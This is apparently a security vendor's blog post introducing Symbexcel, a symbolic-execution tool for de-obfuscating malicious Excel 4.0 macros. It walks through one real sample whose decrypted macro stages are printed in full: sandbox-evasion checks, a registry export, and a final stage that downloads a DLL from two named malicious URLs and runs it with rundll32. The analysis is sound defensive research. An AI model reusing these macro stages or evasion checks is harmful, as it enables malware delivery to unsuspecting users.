Threat Analysis Unit

Symbexcel: Bringing the Power of Symbolic Execution to the Fight Against Malicious Excel 4 Macros

Office macros are a popular attack vector to compromise a user’s environment and deploy additional components. That’s because macros can hide within documents, often under several layers of obfuscation. In recent years, there has been an increase in attacks that leverage Excel 4.0 macros as threat actors have realized the power that this legacy functionality provides to an attacker.

Analyzing Excel 4.0 macros can be a daunting task, because the analysis often requires manual, step-by-step execution of the code to extract behaviors and IoCs such as the URLs from which additional malware components will be downloaded.

In this blog post, we present Symbexcel, a novel solution based on symbolic execution for the automated de-obfuscation and analysis of Excel 4.0 macros. Our approach was recently presented at Black Hat 2021 [1].

What Are Excel 4.0 Macros?

Excel 4.0 macros, or XLM macros, are a 30-year-old feature of Microsoft Excel that allows one to encode a series of operations into the contents of spreadsheet cells. Unlike the traditional functions provided by an Excel spreadsheet (such as SUM), Excel 4.0 macro functions have access to the Windows API and can be used to interact with the underlying operating system; for example, they can execute external commands or invoke PowerShell.

These macros, which have largely been made obsolete by VBA macros, reside on an Excel 4.0-enabled macro sheet. A macro execution starts from a specific cell (identified by the Auto_Open label). Once the function in that cell is executed, the control flow moves to the cell below it, and so on. The standard control flow can be modified with functions such as GOTO, which allows one to jump to a different cell.

The content of cells can be modified using the FORMULA and FORMULA.FILL functions. These functions support dynamic code generation, in which the function to be performed is first written to a cell and then the control flow is directed to that cell, making static analysis of code extremely challenging.
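The control-flow rules described above can be illustrated with a toy model. The following Python sketch is not an Excel emulator: the `run` function, the tuple-encoded instructions, and the `calc.exe` payload are all hypothetical, chosen only to show how a FORMULA-style write can create the instruction that is executed next.

```python
# Toy model of XLM control flow (illustrative only, not a real Excel emulator).
# Cells are keyed by (column, row); execution walks down a column row by row.

def run(sheet, start, max_steps=100):
    """Execute tuple-encoded instructions starting at `start`; return the trace."""
    col, row = start
    trace = []
    for _ in range(max_steps):
        insn = sheet.get((col, row))
        if insn is None or insn[0] == "HALT":
            break
        trace.append(((col, row), insn))
        op = insn[0]
        if op == "GOTO":
            # Jump: continue from the target cell instead of the cell below.
            col, row = insn[1]
            continue
        if op == "FORMULA":
            # Dynamic code generation: write a new instruction into a cell.
            _, new_insn, target = insn
            sheet[target] = new_insn
        row += 1  # default control flow: move to the cell below
    return trace


sheet = {
    ("A", 1): ("FORMULA", ("EXEC", "calc.exe"), ("A", 3)),  # writes code into A3
    ("A", 2): ("GOTO", ("A", 3)),                           # then jumps to it
    ("A", 4): ("HALT",),
}
trace = run(sheet, ("A", 1))
executed_ops = [insn[0] for _, insn in trace]
```

In this sketch the `EXEC` instruction does not exist anywhere in the initial sheet; it only appears in the trace because an earlier instruction wrote it, which is why a purely static scan of the cells would miss it.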

Evasion and Obfuscation

The flexibility of Excel 4.0 macros supports both obfuscation and evasion techniques.

In a series of previous posts [2] [3], we have described how these techniques evolve over time to foil analysis attempts and avoid detection. For example, the ability to query the operating environment through the GET.WORKSPACE function allows a macro to exit execution if a mouse is not connected (as may be the case in an artificial analysis environment, such as an emulator). In addition, by using functions like CHAR to translate integers to letters, it’s possible to assemble strings from separate pieces, write them to cells, and then execute them, making static string extraction challenging. Another technique we observed is the use of time information (e.g., the current date) as a key for decrypting parts of the code. In this case, unless the macro is executed on the correct date, the generated code is gibberish, and the malicious behavior is not exposed.
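Two of these tricks can be mimicked in a few lines of Python. This is only a sketch: the code points, the `decode_with_day` helper, and the choice of the day of the month as the key are assumptions made for illustration and are not taken from any specific sample.

```python
# Illustrative only: mimics two obfuscation tricks in Python.
from datetime import date

# 1) CHAR-style assembly: the string never appears literally in the code.
codes = [61, 72, 65, 76, 84, 40, 41]           # hypothetical obfuscated payload
assembled = "".join(chr(c) for c in codes)     # builds "=HALT()"

# 2) Date-keyed decoding: only the expected day of the month yields valid code.
def decode_with_day(encoded, today):
    """Subtract the day of the month from every code point."""
    return "".join(chr(c - today.day) for c in encoded)

encoded = [c + 15 for c in codes]              # encoded for day 15 of a month
right_day = decode_with_day(encoded, date(2021, 8, 15))
wrong_day = decode_with_day(encoded, date(2021, 8, 16))
```

On the expected day the decoded text is a valid formula; on any other day every character is shifted and the result is gibberish, so an analysis run on the wrong date never sees the payload.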

To bypass these evasion and obfuscation techniques, an analyst needs to fully understand the environmental requirements and boundary conditions that must be satisfied for the macro to execute correctly. Otherwise, it becomes difficult, if not impossible, to execute the macro in an analysis environment and extract the IoCs associated with its execution.

Unfortunately, understanding which values need to be returned by functions such as GET.WORKSPACE is not always straightforward, because these values can be used in conditional statements that may lead to a series of complex de-obfuscation steps.

The Power of Symbolic Execution

The need for the automated processing of evasive and obfuscated Excel 4.0 macros led us to apply symbolic execution, a well-known program analysis technique.

In symbolic execution, the inputs to a program, which are usually concrete values such as “5” or “hello world!”, are left unspecified and replaced by symbols. If such a symbolic value, say X, is used in a computation, the result of that computation will be another symbolic value, say Y, which is defined on the basis of X (e.g., Y = X + 1).

Keeping track of these symbolic values is relatively straightforward until they are used in a conditional statement, such as an IF function, as in IF(Y<10, branch1, branch2). Since the value of the variable is unknown, in most cases it is impossible to decide which branch will be taken by the computation. Therefore, the state of the computation is duplicated: one computation will proceed following the true branch (of course remembering the associated constraint, which in our case is Y<10), while the other will proceed following the false branch (with the associated constraint of Y>=10).

By doing this, we can follow all possible computations (with a caveat due to the possibility of an exponential explosion in the number of states and paths), until a certain point in the program is reached. At that point, one can take all the constraints collected and solve them to find a concrete program input (e.g., X=2) that would lead the execution of the program to the specified location.
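The forking and solving steps can be sketched in plain Python. This is a toy under stated assumptions: symbolic values are modelled as functions of the unknown input X, a brute-force search over a small integer range stands in for a real constraint solver, and the second check (Y = 42) is a hypothetical addition used only to show a nested fork.

```python
# Toy symbolic execution of: Y = X + 1; IF(Y < 10, branch1, branch2).
# A brute-force search over a small range stands in for a real SMT solver.

def solve(constraints, domain=range(-100, 101)):
    """Return one X in `domain` satisfying every constraint, or None."""
    for x in domain:
        if all(c(x) for c in constraints):
            return x
    return None

def fork(state, condition):
    """Duplicate a state: one copy assumes `condition`, the other its negation."""
    true_state = {"path": state["path"] + ["true"],
                  "constraints": state["constraints"] + [condition]}
    false_state = {"path": state["path"] + ["false"],
                   "constraints": state["constraints"] + [lambda x: not condition(x)]}
    return true_state, false_state

def Y(x):
    """Y is defined in terms of the symbolic input X."""
    return x + 1

initial = {"path": [], "constraints": []}
branch1, branch2 = fork(initial, lambda x: Y(x) < 10)

# Fork again inside branch2 on a second, hypothetical check: Y == 42.
target, other = fork(branch2, lambda x: Y(x) == 42)

x_for_branch1 = solve(branch1["constraints"])
x_for_target = solve(target["constraints"])
infeasible = solve(branch1["constraints"] + [lambda x: Y(x) == 42])
```

Each state carries the constraints collected along its path, so solving them yields a concrete input that drives execution to that point; a path whose constraints contradict each other (here, Y < 10 together with Y = 42) has no solution and can be discarded.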

Symbexcel

We applied the power of symbolic execution to Excel 4.0 macros and we developed a tool, called Symbexcel, that supports the automated analysis of these macros.

By using symbolic values when a macro retrieves information from the surrounding environment (e.g., the screen size or the time of day), it’s possible to track how that information is used throughout the execution of the macro until a point of interest is reached. At that point, by using a solver, it’s possible to determine likely concrete values for the symbolic values, obtaining the de-obfuscated code.

The architecture of the Symbexcel tool has three main components, as shown in Figure 1.

The Loader component takes an Excel 4.0 macro, parses it, and loads it in the Simulation Manager, initializing the memory and the execution environment.

Then, the Simulation Manager starts executing the macro, creating a new execution state (with the associated constraints) whenever a conditional that uses a symbolic value is encountered.

When one of the current states is considered for execution, the formula in the current cell is parsed and executed using a formula handler. When the parameters of the formula are not symbolic, the formula is simply executed. However, whenever one or more of the parameters are symbolic, the result of the execution may be symbolic as well.

This execution process continues until the function contained in a cell is a symbolic value itself. When this happens, the simulation manager needs to make the symbolic value concrete, so that the resulting function can be executed.

For example, if the contents of a cell are =Y(A4:A10), where Y is a symbolic value, what function will the Simulation Manager execute?

At this point, the Solver Backend, the third component of Symbexcel’s architecture, comes into play. By relying on the Z3 SMT solver, the Solver Backend is able to derive a concrete string that represents the most likely function.

Note that we said “most likely” because in many cases a symbolic expression has many possible concretizations. Consider for example the simple constraint X<42. In this case, X could take infinitely many values that satisfy the constraint. Similarly, when concretizing a formula, one might derive strings that are not valid functions. Therefore, the Solver Backend leverages the Excel 4.0 macro grammar as an oracle, to find a concrete solution that is also a valid function.

Once the function is found, the code is automatically de-obfuscated, and the execution can continue.

Symbexcel in Action

To give an example of how Symbexcel can automatically de-obfuscate Excel 4.0 macros, let’s look at a particular sample, namely an Excel file with the hash 7f606056d6fcb2de7eb72c8eeef9746428bd24bf. This file contains a worksheet named Sheet1 and an Excel 4.0 macro sheet named boxing.

The built-in name Auto_Open points to the cell boxing!A50, and therefore execution will start from the contents of that cell. The sample is structured as a multi-stage payload: an initial de-obfuscation routine decrypts the first stage, and then a second routine is used to de-obfuscate the second, third, and fourth stages.

De-obfuscation Routine 1

The initial de-obfuscation routine is composed of two nested loops. We renamed most of the variables and added some comments to make the code more readable. The outer loop iterates over all the obfuscated instructions:

[boxing!$A$49] 0.0

[boxing!$A$50] =SET.NAME("insn_index",A49)

[boxing!$A$52] =WHILE(AND(insn_index<32.0))

[boxing!$A$53] =SET.NAME("char_index",-2.0)

[boxing!$A$54] =COUNTBLANK($G$11:$I$53)

[boxing!$A$57] =SET.NAME("insn_index",insn_index+1.0)

[boxing!$A$60] =COUNT($H$26:$J$72)

[boxing!$A$61] =SET.NAME("deobfuscated_insn","")

[boxing!$A$64] =COUNTBLANK($G$11:$H$49)

<inner loop>

[boxing!$A$77] =FORMULA(deobfuscated_insn,OFFSET($A$79,insn_index-1.0,0.0))

[boxing!$A$78] =NEXT()

The first stage payload is written by the FORMULA instruction at boxing!$A$77, one instruction at a time (after every inner loop), to the cells A79:A110 (32 instructions in total). Note: Instructions A54, A60, and A64 seem to be irrelevant for the execution.

The inner loop goes through all the characters (or sub-strings) in the instruction and concatenates them into the variable deobfuscated_insn:

[boxing!$A$65] =WHILE(char_index<116.0)

[boxing!$A$67] =SET.NAME("char_index",char_index+2.0)

# read the next character

[boxing!$A$71] =T(OFFSET($C$50,char_index,insn_index))

[boxing!$A$72] =COUNT($C$12:$F$53) # not relevant?

# append the new character or break if it’s the termination sequence

[boxing!$A$73] =IF($A$71="mfQlphHzOI",SET.NAME("char_index",116.0),SET.NAME("deobfuscated_insn",deobfuscated_insn&$A$71))

[boxing!$A$74] =MIN(362.0,-723.0) # not relevant?

[boxing!$A$75] =NEXT()

Every instruction has a maximum length of 59 characters (char_index runs from -2 to 116 in increments of 2, so cells are read at offsets 0 through 116). The characters are read vertically from the range D50:AI166. The termination string for every character sequence is mfQlphHzOI.
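The two nested loops can be re-expressed in Python to make the data layout explicit. This is a sketch rather than the tool's implementation: the `grid` dictionary stands in for the macro sheet, `column_for` is a hypothetical helper that builds test data, and the two sample instructions are invented for illustration.

```python
# Sketch of de-obfuscation routine 1, re-expressed in Python.
# `grid[(row, col)]` stands in for the macro sheet (1-based, C = column 3).
TERMINATOR = "mfQlphHzOI"

def routine1(grid, num_insns=32, base_row=50, base_col=3, max_index=116):
    """Rebuild each instruction by concatenating every second cell of a column."""
    instructions = []
    for insn_index in range(1, num_insns + 1):        # outer loop (A52..A78)
        deobfuscated_insn = ""
        char_index = -2
        while char_index < max_index:                 # inner loop (A65..A75)
            char_index += 2
            # Mirrors T(OFFSET($C$50, char_index, insn_index)).
            piece = grid.get((base_row + char_index, base_col + insn_index), "")
            if piece == TERMINATOR:
                break
            deobfuscated_insn += piece
        instructions.append(deobfuscated_insn)        # FORMULA(...) at A77
    return instructions


def column_for(text, col, base_row=50):
    """Hypothetical helper: lay `text` out the way routine 1 expects to read it."""
    cells = {(base_row + 2 * i, col): ch for i, ch in enumerate(text)}
    cells[(base_row + 2 * len(text), col)] = TERMINATOR
    return cells

grid = {}
grid.update(column_for("=ALERT(1)", col=4))    # column D holds instruction 1
grid.update(column_for("=HALT()", col=5))      # column E holds instruction 2
decoded = routine1(grid, num_insns=2)
```

The macro breaks out of the inner loop by setting char_index to 116; the sketch uses `break`, which has the same effect.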

The First Stage

The de-obfuscated first stage payload is:

[boxing!$A$79] =CALL("Xlcall32","Excel4","2JRJRR#",4,,2,100,200)

[boxing!$A$80] =ON.TIME(NOW()+"00:00:01", "R104C1")

[boxing!$A$104] routine2=R82C1

# routine2 pre-initialization

[boxing!$A$105] start_row=50

[boxing!$A$106] start_col=1

[boxing!$A$107] key=R50C3:R59C3

[boxing!$A$108] num_insns=17

[boxing!$A$109] payload_destination=R111C1

[boxing!$A$110] =routine2()

<deobfuscation routine 2>

De-obfuscation Routine 2

The second de-obfuscation routine is very different from the first one. The payload is not simply concatenated. Every encrypted character is read from the worksheet Sheet1 and decrypted using a Vigenère cipher and a decryption key, which is stored in a memory range, i.e., C50:C59 for the second stage.

There is an initialization sequence:

[boxing!$A$82] key_index=0

[boxing!$A$83] insn_index=0

[boxing!$A$84] key_length=ROWS(key)

There is an outer loop:

[boxing!$A$85] =WHILE(insn_index<num_insns)

[boxing!$A$86] char_index=-1

[boxing!$A$87] insn_index=insn_index+1

[boxing!$A$88] deobfuscated_insn=""

<inner loop>

# after every inner loop, write the deobfuscated instruction to an offset calculated from payload_destination

[boxing!$A$101] =FORMULA(deobfuscated_insn,ABSREF("R["&(insn_index-1)&"]C[0]",payload_destination))

[boxing!$A$102] =NEXT()

[boxing!$A$103] =RETURN()

And here is the inner loop:

[boxing!$A$89] =WHILE(char_index<500)

[boxing!$A$90] char_index=char_index+1

# read the encrypted character from the worksheet Sheet1

[boxing!$A$91] =INDIRECT(ADDRESS(char_index+start_row,insn_index+start_col,,,"Sheet1"))

# break if it is the termination character

[boxing!$A$92] =IF(R91C1>1000)

[boxing!$A$93] char_index=500

# else read the corresponding key value (and increment key_index)

[boxing!$A$94] =ELSE()

[boxing!$A$95] i=MOD(key_index,key_length)+1

[boxing!$A$96] key_value=INDEX(key,i)

[boxing!$A$97] key_index=key_index+1

# shift and concatenate the encrypted character using the key value (Vigenere)

[boxing!$A$98] deobfuscated_insn=deobfuscated_insn&CHAR(R91C1-key_value)

[boxing!$A$99] =END.IF()

[boxing!$A$100] =NEXT()
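The same routine can be written compactly in Python. The sketch below is an illustrative re-expression, not Symbexcel code: `sheet1` is a dictionary standing in for the Sheet1 worksheet, `encrypt_columns` is a hypothetical inverse used only to build test data, and the key and plaintext lines are example values. Note that key_index is initialized once (at A82) and keeps advancing across instructions.

```python
# Sketch of de-obfuscation routine 2 in Python (illustrative re-expression).
# `sheet1[(row, col)]` stands in for the numeric cells of the Sheet1 worksheet.

def routine2(sheet1, key, num_insns, start_row, start_col, max_chars=500):
    """Decode `num_insns` columns by subtracting a repeating key from each cell."""
    instructions = []
    key_index = 0                                   # shared across instructions
    for insn_index in range(1, num_insns + 1):      # outer loop (A85..A102)
        decoded = ""
        char_index = -1
        while char_index < max_chars:               # inner loop (A89..A100)
            char_index += 1
            value = sheet1[(char_index + start_row, insn_index + start_col)]
            if value > 1000:                        # termination marker (A92)
                break
            key_value = key[key_index % len(key)]   # INDEX(key, MOD(...)+1)
            key_index += 1
            decoded += chr(value - key_value)       # CHAR(R91C1 - key_value)
        instructions.append(decoded)
    return instructions


def encrypt_columns(lines, key, start_row, start_col):
    """Hypothetical inverse, used only to build test data for this sketch."""
    cells, key_index = {}, 0
    for n, line in enumerate(lines, start=1):
        for i, ch in enumerate(line):
            cells[(start_row + i, start_col + n)] = ord(ch) + key[key_index % len(key)]
            key_index += 1
        cells[(start_row + len(line), start_col + n)] = 9999  # > 1000 terminates
    return cells

key = [-1, 481, 242, -39, -849]   # example key values
plain = ["=NOW()", "=HALT()"]
sheet1 = encrypt_columns(plain, key, start_row=50, start_col=18)
recovered = routine2(sheet1, key, num_insns=2, start_row=50, start_col=18)
```

Because every character depends on a key value, a single wrong key entry corrupts every fifth character of the output (for a five-value key), which is what makes the environment checks that produce the key so effective as an evasion technique.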

Second Stage

Once de-obfuscated, the second stage payload is executed:

# write the 1st character of the final key

[boxing!$A$111] =FORMULA(INT(ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."))+-2,R60C3)

This is the first step in which we produce a symbolic value, because the ALERT function might return a true or false value depending on whether the macro is executed in the proper execution environment. As a result, the value written by the FORMULA function in cell $C$60 (which is R60C3, or Row 60 Column 3) will be symbolic.

The script continues with the following instructions:

[boxing!$A$112] =ERROR(TRUE,R114C1)

# write the 2nd character of the final key

[boxing!$A$113] =FORMULA(INT(FILE.DELETE(GET.DOCUMENT(2)&"\"&GET.WINDOW(31)&":Zone.Identifier"))+480,R61C3)

Once again, the value written by the FORMULA function in cell $C$61 is symbolic. The execution continues with the following instructions:

[boxing!$A$114] =IF(ISERROR(R113C1),CLOSE(FALSE),)

# write the 3rd character of the final key

[boxing!$A$115] =FORMULA(INT(CALL("Xlcall32","Excel4","2JRJRR#",4,,2,-524,397)=-127)+241,R62C3)

# write the 4th character of the final key

[boxing!$A$116] =APP.MAXIMIZE()

[boxing!$A$117] =FORMULA(INT(AND(ISNUMBER(SEARCH("Win",GET.WORKSPACE(1))),GET.WORKSPACE(14)>390,GET.WORKSPACE(42),GET.WORKSPACE(19),GET.WORKSPACE(13)>800))+-40,R63C3)

Note that the GET.WORKSPACE calls above are used to obtain the parameters for the execution environment, and, therefore, symbolic values are returned for all those invocations.

# write the 5th character of the final key

[boxing!$A$118] =NOW()

[boxing!$A$119] =WAIT(NOW()+"00:00:01")

[boxing!$A$120] =NOW()

[boxing!$A$121] =FORMULA(INT((R120C1-R118C1)*100000>1)+-850,R64C3)

The above code checks whether or not the timing is implemented correctly (i.e., a second has actually passed when a one second delay was requested), and in this case the NOW function returns symbolic values.

# routine2 pre-initialization

[boxing!$A$122] start_row=50

[boxing!$A$123] start_col=18

[boxing!$A$124] key=R60C3:R64C3

[boxing!$A$125] num_insns=24

[boxing!$A$126] payload_destination=R128C1

[boxing!$A$127] =routine2()

In sum, the second stage is used to calculate the first five characters of the final key — which is the key used to de-obfuscate the fourth (and final) stage. These first five characters are also used to de-obfuscate the third stage.
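The arithmetic behind the timing check at A121 is worth spelling out. Excel's NOW() returns a serial date measured in days, so a one-second delay corresponds to a difference of 1/86400. The Python sketch below reproduces the comparison; the function name and the two sample delays are illustrative assumptions.

```python
# Worked arithmetic for the timing check at A121 (illustrative).
# Excel's NOW() returns a serial date measured in days, so one second is 1/86400.
SECONDS_PER_DAY = 24 * 60 * 60

def timing_key_value(elapsed_seconds, offset=-850):
    """Mirror INT((R120C1-R118C1)*100000>1)+-850 for a given real delay."""
    elapsed_days = elapsed_seconds / SECONDS_PER_DAY
    return int(elapsed_days * 100000 > 1) + offset

honest_wait = timing_key_value(1.0)    # WAIT really slept for one second
skipped_wait = timing_key_value(0.0)   # an environment that skipped the WAIT
```

A real one-second wait gives roughly 1.157 after scaling, which exceeds 1 and yields the key value -849. An analysis environment that skips the delay yields -850, and the later stages then decrypt to gibberish.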

Third Stage

The de-obfuscation routine used for the third stage is the same as that used for the second stage, which we called routine2.

Once de-obfuscated, the routine is the following:

[*boxing!$A$128] p="C:\Users\Public\Documents\"

# open and write random stuff to a file just to make it more complex to calculate the 6th character of the final key

[*boxing!$A$129] =FOPEN(p&"iYUebH.txt",3)

[*boxing!$A$130] =WHILE(FSIZE(R129C1)<5336)

Note that the three instructions above, marked with a *, were symbolic in nature.

At this point, in order to understand which function to execute, the solver needs to concretize the symbolic values using the constraints.

For example, the contents of $A$130 are the following:

Concat(Unit(int2bv(ToInt(-788 - ToReal(If(observer_4, 1, 0) + -850) + 1/100000000))), Concat("W", Concat(Unit(int2bv(ToInt(553 - ToReal(If(file_delete_handler_1, 1, 0) + 480) + 1/100000000))), Concat(Unit(int2bv(ToInt(315 - ToReal(If(observer_1, 1, 0) + 241) + 1/100000000))), Concat(Unit(int2bv(ToInt(37 - ToReal(If(observer_and_1, 1, 0) + -40) + 1/100000000))), Concat(Unit(int2bv(ToInt(-780 - ToReal(If(observer_4, 1, 0) + -850) + 1/100000000))), Concat("(", Concat(Unit(int2bv(ToInt(551 - ToReal(If(file_delete_handler_1, 1, 0) + 480) + 1/100000000))), Concat(Unit(int2bv(ToInt(325 - ToReal(If(observer_1, 1, 0) + 241) + 1/100000000))), Concat(Unit(int2bv(ToInt(34 - ToReal(If(observer_and_1, 1, 0) + -40) + 1/100000000))), Concat(Unit(int2bv(ToInt(-759 - ToReal(If(observer_4, 1, 0) + -850) + 1/100000000))), Concat("E", Concat(Unit(int2bv(ToInt(521 - ToReal(If(…, …, …) + 480) + 1/100000000))), Concat(Unit(int2bv(ToInt(324 - ToReal(… + …) + 1/100000000))), Concat(Unit(int2bv(ToInt(10 - ToReal(…) + 1/100000000))), Concat(Unit(int2bv(ToInt(… - … + 1/100000000))), Concat("9", Concat(Unit(int2bv(ToInt(…))), Concat(Unit(int2bv(…)), Concat(Unit(…), Concat(…, …)))))))))))))))))))))

Symbexcel uses the Z3 SMT solver combined with meta-information about the Excel grammar to derive the string WHILE(FSIZE(R129C1)<5336) from the constraints that define the symbolic value.
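To make this step concrete, the sketch below concretizes only the first twelve characters of the expression above, using the constants that are not elided. It is a toy, not Symbexcel's solver: an exhaustive search over the four boolean symbols stands in for Z3, and a regular expression plus a small, hand-picked set of function names (`KNOWN_FUNCTIONS`, an assumption) stands in for the Excel 4.0 macro grammar.

```python
# Toy concretization of the first twelve characters of the A130 expression.
# Exhaustive search over four booleans stands in for the Z3 SMT solver.
import itertools
import re

SYMBOLS = ["observer_4", "file_delete_handler_1", "observer_1", "observer_and_1"]

# (encrypted constant, symbol, key offset) or a literal character, copied from
# the non-elided prefix of the expression above.
TERMS = [
    (-788, "observer_4", -850), "W",
    (553, "file_delete_handler_1", 480),
    (315, "observer_1", 241),
    (37, "observer_and_1", -40),
    (-780, "observer_4", -850), "(",
    (551, "file_delete_handler_1", 480),
    (325, "observer_1", 241),
    (34, "observer_and_1", -40),
    (-759, "observer_4", -850), "E",
]

# Simplified stand-in for the grammar oracle (hypothetical, far from complete).
KNOWN_FUNCTIONS = {"WHILE", "FSIZE", "FOPEN", "FORMULA", "IF", "NEXT"}
SHAPE = re.compile(r"=([A-Z.]+)\(([A-Z.]+)")

def accepted_by_grammar(text):
    """Accept '=NAME(NAME' only when both names are known functions."""
    match = SHAPE.fullmatch(text)
    return bool(match) and all(name in KNOWN_FUNCTIONS for name in match.groups())

def concretize(assignment):
    """Evaluate every term under one True/False assignment of the symbols."""
    chars = []
    for term in TERMS:
        if isinstance(term, str):
            chars.append(term)
        else:
            constant, symbol, offset = term
            chars.append(chr(constant - (int(assignment[symbol]) + offset)))
    return "".join(chars)

valid = []
for values in itertools.product([False, True], repeat=len(SYMBOLS)):
    assignment = dict(zip(SYMBOLS, values))
    candidate = concretize(assignment)
    if accepted_by_grammar(candidate):
        valid.append((assignment, candidate))
```

Of the sixteen possible assignments, only the one in which all four symbols are true produces a prefix made of known function names. Every other assignment shifts some characters by one, giving strings such as one starting with ">" instead of "=", which the oracle rejects.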

The execution continues with the following instructions:

[boxing!$A$131] =FWRITE(R129C1,CHAR(RANDBETWEEN(33,125)))

[boxing!$A$132] =NEXT()

# write the 6th character of the final key

[*boxing!$A$133] =FORMULA(INT(FSIZE(R129C1)=5336)+540,R65C3)

[*boxing!$A$134] =FCLOSE(R129C1)

# write the registry key Excel\Security to C:\Users\Public\Documents\bZPf.txt

[*boxing!$A$135] ="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&p&"bZPf.txt /y"

[*boxing!$A$136] =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R135C1,0,5)

[*boxing!$A$137] =WHILE(ISERROR(FILES(p&"bZPf.txt")))

# open the file and read 255 bytes at offset 215 into A142

[*boxing!$A$140] =FOPEN(p&"bZPf.txt")

[*boxing!$A$141] =FPOS(R140C1,215)

[*boxing!$A$142] =FREAD(R140C1,255)

[*boxing!$A$143] =FCLOSE(R140C1)

[*boxing!$A$144] =FILE.DELETE(p&"bZPf.txt")

# check if macro security = “Enable All” (used to calculate the 7th character of the final key)

[*boxing!$A$145] =FORMULA(INT(ISNUMBER(SEARCH("""VBAWarnings""=dword:00000001",R142C1)))+774,R66C3)

# routine2 pre-initialization

[*boxing!$A$146] start_row=50

[*boxing!$A$147] start_col=42

[*boxing!$A$148] key=R60C3:R66C3

[*boxing!$A$149] num_insns=9

[*boxing!$A$150] payload_destination=R152C1

[*boxing!$A$151] =routine2()

Again, one can see that many of the instructions above were actually symbolic and were made concrete using Symbexcel’s solver.

The third stage calculates the 6th and 7th characters of the final key, and then dispatches the execution to the de-obfuscation routine routine2 to de-obfuscate the final stage.

The values of the final key are: [-1, 481, 242, -39, -849, 541, 774].
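These values follow directly from the offsets in the seven FORMULA calls: each key entry is the offset plus 1 if the corresponding check succeeds, or plus 0 otherwise. The short Python sketch below redoes that arithmetic. The check outcomes listed are the ones consistent with the key above, and the table layout is an illustrative choice.

```python
# Recompute the final key from the offsets in the FORMULA calls (illustrative).
# Each entry: (cell, offset added to INT(check), outcome of the check).
# The outcomes are the ones consistent with the key values reported above.
KEY_CHECKS = [
    ("R60C3", -2,   True),    # ALERT dialog
    ("R61C3", 480,  True),    # FILE.DELETE of the Zone.Identifier stream
    ("R62C3", 241,  True),    # CALL(...) = -127
    ("R63C3", -40,  True),    # GET.WORKSPACE environment checks
    ("R64C3", -850, True),    # the WAIT lasted about one second
    ("R65C3", 540,  True),    # FSIZE reached 5336
    ("R66C3", 774,  False),   # VBAWarnings = 1 not found in the registry export
]

final_key = [int(outcome) + offset for _, offset, outcome in KEY_CHECKS]
```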

Fourth Stage

The decrypted fourth stage shows the URLs used to download the additional components of the malware.

[*boxing!$A$152] zzz="https://derocktech.com/k.php"

[*boxing!$A$153] xxx="https://solemnenterprise.com/k.php"

[*boxing!$A$154] =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,zzz,p&"aby.txt",0,0)

[*boxing!$A$155] =IF(R154C1<>0,,GOTO(R157C1))

[*boxing!$A$156] =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,xxx,p&"aby.txt",0,0)

[*boxing!$A$157] a="ShellExecuteA"

[*boxing!$A$158] b="C:\Windows\system32\rundll32.exe"

[*boxing!$A$159] =CALL("Shell32",a,"JJCCCJJ",0,"open",b,p&"aby.txt,DllRegisterServer ",0,5)

[*boxing!$A$160] =CLOSE(FALSE)

More precisely, the final stage downloads a file from https://derocktech.com/k.php (or from https://solemnenterprise.com/k.php if the first endpoint fails) and saves it to C:\Users\Public\Documents\aby.txt. This file is a Windows DLL, which is loaded and registered using rundll32.exe.
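Once the final stage is available as plain text, extracting network IoCs is a simple pattern match. The Python sketch below shows one possible approach; the regular expression is a deliberately simple assumption, and the input lines are three of the de-obfuscated instructions listed above.

```python
# Minimal IoC extraction from de-obfuscated formulas (illustrative sketch).
import re

deobfuscated = [
    'zzz="https://derocktech.com/k.php"',
    'xxx="https://solemnenterprise.com/k.php"',
    '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,zzz,p&"aby.txt",0,0)',
]

# Deliberately simple pattern: scheme, then everything up to a quote or space.
URL_PATTERN = re.compile(r'https?://[^\s"]+')
urls = [url for line in deobfuscated for url in URL_PATTERN.findall(line)]
```

The same pattern finds nothing in the obfuscated sheet, because the URLs exist there only as encrypted integers in Sheet1.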

The whole execution graph, with the instructions that were symbolic in green, is shown below.

Figure 2: Excel 4.0 macro execution flow. The green nodes contained symbolic values. The red node is a failed concretization that resulted in an abandoned path.

Note that the red node in the figure above is the result of a failed concretization. This is because, as explained earlier, there may be multiple values that satisfy a particular set of constraints. However, once a set of values is chosen, Symbexcel uses meta-information about the grammar of Excel instructions to remove concretizations that would lead to incorrect results.

The Symbexcel Advantage

The use of symbolic execution brings a new tool to the fight against obfuscated macros that perform checks against the environment in order to evade analysis. This Excel 4.0 sample will de-obfuscate correctly only if the host has the correct environment. A possible set of correct environment values is:

call_handler_2 = -127 # call at boxing!$A$115 (spawn a new process) succeeds

call_handler_4 != 0 # call at boxing!$A$154 (download DLL) succeeds

workspace_1 = "Win" # operating system

workspace_13 = 801 # workspace width

workspace_14 = 391 # workspace height

workspace_19 = True # mouse present

workspace_42 = True # sound enabled

(boxing!$A$120 - boxing!$A$118)*100000 > 1 # time difference after wait

file_delete_handler_1 = True # Alternate Data Streams (ADS) are present

observer_isnumber_2 = False # macro security != “Enable All”

While it would be extremely complex for an analyst to determine which values would eventually lead to the correctly de-obfuscated code, Symbexcel is able to automatically collect and resolve the constraints to reach the final stage of this complex de-obfuscation process.

Conclusions

Excel 4.0 macros are a continuously evolving threat that is challenging to de-obfuscate and execute correctly in order to extract behaviors and IoCs. In this post, we described a novel approach, called Symbexcel, that harnesses the power of symbolic execution to support the automated analysis of these macros. By running our tool on thousands of Excel 4.0 macros and comparing the results to existing analysis tools, we’ve shown that Symbexcel can handle sophisticated evasion and obfuscation techniques that make existing analysis tools fail.

Contributors

The work in this report was contributed by Giovanni Vigna and Nicola Ruaro.

Bibliography

[1] G. Vigna, N. Ruaro, F. Pagani and S. Ortolani, “Symbexcel: Bringing the Power of Symbolic Execution to the Fight Against Malicious Excel 4 Macros,” VMware, August 2021. [Online]. Available: https://www.blackhat.com/us-21/briefings/schedule/#symbexcel-bringing-the-power-of-symbolic-execution-to-the-fight-against-malicious-excel--macros-22893.
[2] S. Ortolani and J. Haughom, “Evolution of Excel 4.0 Macro Weaponization,” Lastline, 2 June 2020. [Online]. Available: https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/.
[3] B. Singh, “Evolution of Excel 4.0 Macro Weaponization – Part 2,” VMware, 14 October 2020. [Online]. Available: https://blogs.vmware.com/networkvirtualization/2020/10/evolution-of-excel-4-0-macro-weaponization-continued.html/.